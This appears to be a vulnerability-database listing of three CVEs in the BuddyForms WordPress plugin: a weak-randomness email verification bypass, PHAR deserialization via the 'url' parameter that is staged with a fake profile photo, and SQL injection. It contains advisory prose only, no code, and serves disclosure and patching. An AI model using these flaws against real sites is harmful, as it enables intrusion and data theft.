CVSS: 6.5EPSS: 0%CPEs: 1EXPL: 0CVE-2024-5149 – BuddyForms <= 2.8.9 - Email Verification Bypass due to Insufficient Randomness
https://notcve.org/view.php?id=CVE-2024-5149
The BuddyForms plugin for WordPress is vulnerable to Email Verification Bypass in all versions up to, and including, 2.8.9 via the use of an insufficiently random activation code. This makes it possible for unauthenticated attackers to bypass the email verification. El complemento BuddyForms para WordPress es vulnerable a la omisión de verificación de correo electrónico en todas las versiones hasta la 2.8.9 incluida mediante el uso de un código de activación insuficientemente aleatorio. Esto hace posible que atacantes no autenticados omitan la verificación por correo electrónico. • https://plugins.trac.wordpress.org/browser/buddyforms/tags/2.8.9/includes/wp-insert-user.php#L334 https://www.wordfence.com/threat-intel/vulnerabilities/id/a5c8d361-698b-4abd-bcdd-0361d3fd10c5?source=cve • CWE-330: Use of Insufficiently Random Values •
CVSS: 9.8EPSS: 0%CPEs: 1EXPL: 1CVE-2023-26326 – BuddyForms <= 2.7.7 - PHAR Deserialization
https://notcve.org/view.php?id=CVE-2023-26326
The BuddyForms WordPress plugin, in versions prior to 2.7.8, was affected by an unauthenticated insecure deserialization issue. An unauthenticated attacker could leverage this issue to call files using a PHAR wrapper that will deserialize the data and call arbitrary PHP Objects that can be used to perform a variety of malicious actions granted a POP chain is also present. The BuddyForms plugin for WordPress is vulnerable to deserialization of untrusted input via the 'url' parameter in versions up to, and including 2.7.7. This makes it possible for authenticated attackers with minimal permissions, such as a subscriber, to call files using a PHAR wrapper that will deserialize the data and call arbitrary PHP Objects that can be used to perform a variety of malicious actions granted a POP chain is also present. It also requires that the attacker is successful in uploading a file with the serialized payload, however, this can easily be achieved by uploading a fake profile photo prior to launching an attack. • https://www.tenable.com/security/research/tra-2023-7 • CWE-502: Deserialization of Untrusted Data •
CVSS: 9.8EPSS: 0%CPEs: 1EXPL: 0CVE-2018-21003 – Post, Registration and Profile Form Builder – FrontEnd Editor BuddyForms – Easy WordPress Forms <= 2.2.7 - SQL Injection
https://notcve.org/view.php?id=CVE-2018-21003
The buddyforms plugin before 2.2.8 for WordPress has SQL injection. El plugin buddyforms versiones anteriores a 2.2.8 para WordPress, presenta una inyección SQL. The Buddyforms plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 2.2.7 due to insufficient escaping on a user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. • https://wordpress.org/plugins/buddyforms/#developers https://wpvulndb.com/vulnerabilities/9829 • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •